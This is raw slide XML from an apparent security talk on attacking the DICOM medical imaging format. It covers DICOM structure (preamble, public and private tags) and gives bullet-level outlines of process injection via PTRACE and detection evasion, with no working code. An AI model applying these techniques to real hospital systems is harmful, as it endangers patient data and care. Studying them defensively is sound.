    <dgm:cxn modelId="{7E89FD9C-A666-4C43-B724-90FC30D8AC3C}" srcId="{649B059D-B11D-4B4D-A9E1-BF6C65A04DE5}" destId="{9D23617C-E284-4E46-84F4-BCE67512CF9D}" srcOrd="0" destOrd="0" parTransId="{93A488CE-7FCF-41AA-A8EA-BA57D28B5DEF}" sibTransId="{45E7C583-2BD2-494A-B11F-8F08D14F012C}"/>
    <dgm:cxn modelId="{CB0F5FB7-1946-8A49-8F65-3D47796A36B4}" type="presOf" srcId="{112D4F47-971E-4FD6-8D59-4B39A1C4E02B}" destId="{EDDBCC65-35A1-6047-8B7E-232897FDB6F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{0B8E24BA-851A-44AE-A424-1F75BF107D9C}" srcId="{649B059D-B11D-4B4D-A9E1-BF6C65A04DE5}" destId="{E79B2C10-52C0-469B-A179-E0E619FC496E}" srcOrd="2" destOrd="0" parTransId="{A7909B12-9151-4815-9BF5-1DC08F2F805B}" sibTransId="{8CE8CEA8-C112-41F6-8CDB-C97435CB3383}"/>
    <dgm:cxn modelId="{916EAFC0-05C4-FD46-B02F-65874372208F}" type="presOf" srcId="{6EAAFF42-DB0B-4383-9745-9AABA10F2B2F}" destId="{281A2E18-D3A1-5644-8CD3-77FC2B124FEB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D55157C8-E0D8-E14F-8BBB-70DFB05850FC}" type="presOf" srcId="{9D23617C-E284-4E46-84F4-BCE67512CF9D}" destId="{6436D210-5165-9844-AE6B-199AA9768B9C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8A27F0D0-382B-B348-8FB7-304681265A32}" type="presOf" srcId="{51F5BDDF-C46B-413C-B135-2CB82386D1FD}" destId="{53EDFA43-5743-A248-A51D-DA73459675E8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B61D6DE2-4725-2449-A5D7-1318F7882EEB}" type="presOf" srcId="{5E90185B-54DC-4224-8BD1-702ADA7CD790}" destId="{AADAE5DF-0439-5246-8034-E3AEC07E0204}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{585FABE8-0287-484C-A8EE-C358B091D254}" type="presOf" srcId="{E79B2C10-52C0-469B-A179-E0E619FC496E}" destId="{FE9C9BD9-CA85-F141-A04E-205071AB6C7B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A327DBF9-F763-4FA3-AAF9-D6DE92995FDD}" srcId="{649B059D-B11D-4B4D-A9E1-BF6C65A04DE5}" destId="{112D4F47-971E-4FD6-8D59-4B39A1C4E02B}" srcOrd="3" destOrd="0" parTransId="{7D2CADDA-6A6C-4DBA-B8A0-5BDCFEA89BC0}" sibTransId="{C8669C19-9DFD-4340-B715-B1E362C09E13}"/>
    <dgm:cxn modelId="{77607842-BA93-C347-858D-56268519E0B6}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{6436D210-5165-9844-AE6B-199AA9768B9C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B966DB39-26BA-1A48-AB5A-D85A5EB01584}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{C25E08A2-3F4E-9044-8338-32061F5A4A70}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{42CAC1BE-8B3E-B741-B0BB-56F776739AA0}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{281A2E18-D3A1-5644-8CD3-77FC2B124FEB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D2F5CFDB-81B1-0445-BF46-9DF96BCB47A6}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{6E6BCBFB-9237-1B4B-90E8-183E337F0505}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{140D73F7-F53E-0445-B88B-01A2AF468BE8}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{FE9C9BD9-CA85-F141-A04E-205071AB6C7B}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{CC8CF506-70AB-9A46-BD97-ADE3EBF1D431}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{5EB6ADB6-3946-2042-ADE4-8B96B92A59E1}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{5B1727F2-ED6F-A94B-8D59-7C9AFAA072A4}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{EDDBCC65-35A1-6047-8B7E-232897FDB6F4}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9A79023D-F096-7240-B34F-CE962A065B9A}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{8FE6643A-41F7-B943-ACB0-015B0042ED02}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{81389EC4-5801-0A47-9831-F841D3C7A23D}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{53EDFA43-5743-A248-A51D-DA73459675E8}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{66E6976E-E162-534B-9515-987ECC3FAB72}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{960F64F4-F3CA-0641-BC34-6CEB2F0FFE66}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{9A9C9D4D-560A-2C4F-8397-3AF7A846FBE8}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{AADAE5DF-0439-5246-8034-E3AEC07E0204}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{810ED083-EC15-6840-A49F-81839C4F96A2}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{31BB5537-1B9D-5444-A33F-E0BEB311F071}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{11E8DE8C-91EA-0141-A403-6DD3040EA07C}" type="presParOf" srcId="{671635DF-55A8-3545-942F-23485DB39334}" destId="{DA761FD9-D406-9540-B3EC-3DF46FDFE96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DB4D1-47C4-434E-ADF5-EE7E61BBA462}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="991698" y="70192"/>
          <a:ext cx="1056186" cy="1056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BF98B-94C1-44F7-9991-DEF0A19D7E16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10954" y="1277232"/>
          <a:ext cx="3017675" cy="452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000" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>File type</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="10954" y="1277232"/>
        <a:ext cx="3017675" cy="452651"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{55EF5413-E90E-4289-9DFA-5165AD6FC8B4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10954" y="1800047"/>
          <a:ext cx="3017675" cy="1778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</a:rPr>
            <a:t>CT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</a:rPr>
            <a:t>MRI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</a:rPr>
            <a:t>X-RAY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</a:rPr>
            <a:t>ULTRA SOUND </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="10954" y="1800047"/>
        <a:ext cx="3017675" cy="1778359"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{58692E8B-7EF3-47FE-9DD8-0EFC24A000CC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4537466" y="70192"/>
          <a:ext cx="1056186" cy="1056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50565-B9A4-4953-B745-7E757A5A4D75}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3556722" y="1277232"/>
          <a:ext cx="3017675" cy="452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000" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Storage</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3556722" y="1277232"/>
        <a:ext cx="3017675" cy="452651"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{42F53EE7-205C-4479-B7E7-30F375FF97F1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3556722" y="1800047"/>
          <a:ext cx="3017675" cy="1778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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Managing Medical Information </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3556722" y="1800047"/>
        <a:ext cx="3017675" cy="1778359"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{54356A9D-49B1-4B54-98AE-7772723EB46D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8083235" y="70192"/>
          <a:ext cx="1056186" cy="1056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D4370-CC2C-44E3-8BEF-3B2727516FAF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7102490" y="1277232"/>
          <a:ext cx="3017675" cy="452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000" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Preview</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="3000" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7102490" y="1277232"/>
        <a:ext cx="3017675" cy="452651"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E4BF76B1-A3B8-4822-8C23-4ECD5526BE8F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7102490" y="1800047"/>
          <a:ext cx="3017675" cy="1778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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>.DCM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bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Yet another file extension </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7102490" y="1800047"/>
        <a:ext cx="3017675" cy="1778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E48BB-1D68-F743-8EA9-33A2457482D1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2640"/>
          <a:ext cx="51419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CAE8C-E851-F84F-82E9-4D0B82C0D96A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="335153"/>
          <a:ext cx="5141912" cy="180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Turn a good process into a bad one</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="335153"/>
        <a:ext cx="5141912" cy="1800581"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E61E4CC6-A70A-6E42-BAB8-435E77825B4D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1803221"/>
          <a:ext cx="51419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CD127-76CD-7F49-8D21-F00CA44BB67A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1803221"/>
          <a:ext cx="5141912" cy="180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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Run in another process memory </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1803221"/>
        <a:ext cx="5141912" cy="1800581"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE134243-9362-1949-B1AA-07496CBFFADD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3603802"/>
          <a:ext cx="51419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07F9F-213E-7D4E-A866-49DD69399BA5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3603802"/>
          <a:ext cx="5141912" cy="180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Evades detection</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3603802"/>
        <a:ext cx="5141912" cy="18005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6D210-5165-9844-AE6B-199AA9768B9C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="168392"/>
          <a:ext cx="5141912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Well, no API, bummer!</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31984" y="200376"/>
        <a:ext cx="5077944" cy="591232"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{281A2E18-D3A1-5644-8CD3-77FC2B124FEB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="904232"/>
          <a:ext cx="5141912" cy="655200"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-518358"/>
            <a:satOff val="-2742"/>
            <a:lumOff val="-1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PTRACE</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31984" y="936216"/>
        <a:ext cx="5077944" cy="591232"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FE9C9BD9-CA85-F141-A04E-205071AB6C7B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1640072"/>
          <a:ext cx="5141912" cy="655200"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-1036716"/>
            <a:satOff val="-5484"/>
            <a:lumOff val="-20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Why was this introduced? </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31984" y="1672056"/>
        <a:ext cx="5077944" cy="591232"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EDDBCC65-35A1-6047-8B7E-232897FDB6F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2375912"/>
          <a:ext cx="5141912" cy="655200"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-1555074"/>
            <a:satOff val="-8227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Patching into Running process</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31984" y="2407896"/>
        <a:ext cx="5077944" cy="591232"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{53EDFA43-5743-A248-A51D-DA73459675E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3111752"/>
          <a:ext cx="5141912" cy="655200"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-2073432"/>
            <a:satOff val="-10969"/>
            <a:lumOff val="-41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Locate the process </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31984" y="3143736"/>
        <a:ext cx="5077944" cy="591232"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AADAE5DF-0439-5246-8034-E3AEC07E0204}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3847592"/>
          <a:ext cx="5141912" cy="655200"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="-2591790"/>
            <a:satOff val="-13711"/>
            <a:lumOff val="-52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Attach to the process</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31984" y="3879576"/>
        <a:ext cx="5077944" cy="591232"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA761FD9-D406-9540-B3EC-3DF46FDFE96A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4583432"/>
          <a:ext cx="5141912" cy="65520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Challenges, Where to attach ? </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="31984" y="4615416"/>
        <a:ext cx="5077944" cy="59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8B61A-FE96-8A41-959A-0D967449293C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/10/22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C89C8-F2DB-A342-A844-7508B5F15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4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4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10131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85800" y="4047840"/>
            <a:ext cx="10131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877360" y="404784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111200" y="214200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7536600" y="214200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85800" y="404784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111200" y="404784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7536600" y="4047840"/>
            <a:ext cx="326196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9AF0-8000-C84C-951C-22633BA9EBCC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A0BC-A60F-E04B-B6DC-64EB6CB95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602317"/>
            <a:ext cx="10769600" cy="374294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0" y="5530961"/>
            <a:ext cx="11021567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455085"/>
            <a:ext cx="1102156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310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2220244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822" indent="-15662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Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2667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214" indent="-15239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Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="24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607" indent="-15239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999" indent="-152392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391" indent="-15239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455086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7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6"/>
            <a:ext cx="47578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 dirty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C46F59-AB9D-4F81-AF62-A160A8968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788" y="2"/>
            <a:ext cx="6106789" cy="23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1013112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88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88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10131120" cy="674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88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88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877360" y="404784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88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10131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elestia-R1---OverlayTitleHD.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId18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962520" y="1964160"/>
            <a:ext cx="7197480" cy="2421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GB" sz="4800" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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932680" y="5870520"/>
            <a:ext cx="159984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FD0760A-B04D-4074-A2B1-91AF66ACC61C}" type="datetime">
              <a:rPr lang="en-US" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>9/10/22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962520" y="5870520"/>
            <a:ext cx="489348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10608840" y="5870520"/>
            <a:ext cx="55080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B26E6AD-C6FF-49B3-A199-E08AB199172B}" type="slidenum">
              <a:rPr lang="en-US" sz="1000" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri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FFFFFF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raw.githubusercontent.com/d00rt/pedicom/master/doc/Attacking_Digital_Imaging_and_Communication_in_Medicine_(DICOM)_file_format_standard_-_Markel_Picado_Ortiz_(d00rt).pdf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raw.githubusercontent.com/d00rt/pedicom/master/doc/Attacking_Digital_Imaging_and_Communication_in_Medicine_(DICOM)_file_format_standard_-_Markel_Picado_Ortiz_(d00rt)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3920957" y="561649"/>
            <a:ext cx="8271043" cy="2421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4800" b="0" strike="noStrike" cap="all" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t> Honey, I just put the hospital on the Ventilator</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4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4364302" y="5688207"/>
            <a:ext cx="7197480" cy="14050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en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Rakesh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>MahanThi</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2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en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Shyam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> Sundar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" strike="noStrike" cap="all" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Ramaswami</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="28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70E6-4880-D47D-C8C2-7FC8F7EAD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1" y="0"/>
            <a:ext cx="439131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689644" y="0"/>
            <a:ext cx="9483120" cy="116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200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>DICOM Hierarchy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="114" name="Picture 113"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2153160" y="950400"/>
            <a:ext cx="7998840" cy="5745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58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7865640" y="643320"/>
            <a:ext cx="4197406" cy="1607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Now, the real deal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TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092462" y="1993005"/>
            <a:ext cx="5099538" cy="3971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Public tags: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Even numbered</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRP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Private tags: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Odd numbered</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0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endParaRPr lang="en-US" sz="20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E7394-C042-4203-9EA1-68E7AA18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8" y="1167206"/>
            <a:ext cx="5502720" cy="45235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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Why preamble has 128 empty bytes at the beginning ??</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6120000" y="2232000"/>
            <a:ext cx="4680000" cy="137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IN" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>* Allow compatibility with 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="0" strike="noStrike" spc="-1" baseline="14000000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> party readers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>* Enable smooth transition from other file formats like TIFF, JPG, JPEG, NIFTI etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial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79E0E-FC01-45F3-B71E-CB29BE1A4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75405"/>
            <a:ext cx="5094311" cy="27703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672767" y="1312900"/>
            <a:ext cx="7909596" cy="97204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US" sz="3600" b="0" strike="noStrike" cap="all" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
